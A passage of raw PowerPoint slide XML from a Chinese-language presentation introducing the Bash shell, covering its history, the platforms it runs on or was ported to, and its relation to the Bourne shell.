              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Unix </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>shell,  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1987</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>年由布莱恩</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>·</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>福克斯为了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>GNU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>计划而编写。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1989</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>年发布第一个正式版本，原先是计划用在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>GNU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>操作系统上，但能运行于大多数类</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Unix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>系统的操作系统之上</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>，包括</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Mac OS X </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>v10.4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>都</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>将它作为默认</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>。它也</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="274320" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>被</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>移植</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Microsoft Windows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>上的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Cygwin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>MinGW</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>，在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Novell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> NetWare</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Android</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>上也</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>有</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="274320" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>移植。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="274320" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="274320" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="274320" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>GNU(GNU is Not Unix)</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66"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4583016" y="2808608"/>
            <a:ext cx="4074067" cy="3486150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln/>
          <a:ex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719249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Bash Shell</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219200"/>
            <a:ext cx="8229600" cy="2497832"/>
          </a:xfrm>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="accent2"/>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="lt1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent2"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="dk1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="新宋体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="新宋体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>Bash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="新宋体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="新宋体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>是 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="新宋体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="新宋体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>sh(Bourne Shell) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="新宋体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="新宋体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>的一个超集，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="新宋体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="新宋体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>Bourne shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="新宋体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="新宋体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>脚本大多不经修改即可以在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="新宋体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="新宋体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>bash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="新宋体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="新宋体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>中执行，只用了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="新宋体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="新宋体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>Bourne</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="新宋体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="新宋体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>特殊变量或使用了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="新宋体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="新宋体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>Bourne</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="新宋体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="新宋体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>的内置命令的脚本才需要修改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="新宋体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="新宋体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:latin typeface="新宋体" pitchFamily="49" charset="-122"/>
              <a:ea typeface="新宋体" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="新宋体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="新宋体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>Bash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="新宋体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="新宋体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="新宋体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="新宋体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>语法针对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="新宋体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="新宋体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>Bourne shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="新宋体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="新宋体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>的不足做了很多</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="新宋体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="新宋体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>扩展</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="新宋体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="新宋体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="新宋体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="新宋体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>像使用整数，输入输出重定向，进程内的正则表达式，等等。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="新宋体" pitchFamily="49" charset="-122"/>
              <a:ea typeface="新宋体" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="新宋体" pitchFamily="49" charset="-122"/>
              <a:ea typeface="新宋体" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="新宋体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="新宋体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>现在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="新宋体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="新宋体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>Bash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="新宋体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="新宋体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>的稳定版本为 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="新宋体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="新宋体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>4.3</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028"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="467544" y="3880863"/>
            <a:ext cx="8208912" cy="1959443"/>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359277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Bash Shell</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467544" y="1219200"/>
            <a:ext cx="8219256" cy="1057672"/>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zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1990</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>年的时候，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Bash Shell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>还只是众多的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Unix Shell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>中的一个小角色，但是现在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Bash Shell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>已经成为了全球使用最广泛的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Shell</a:t>
            </a:r>
            <a:r>
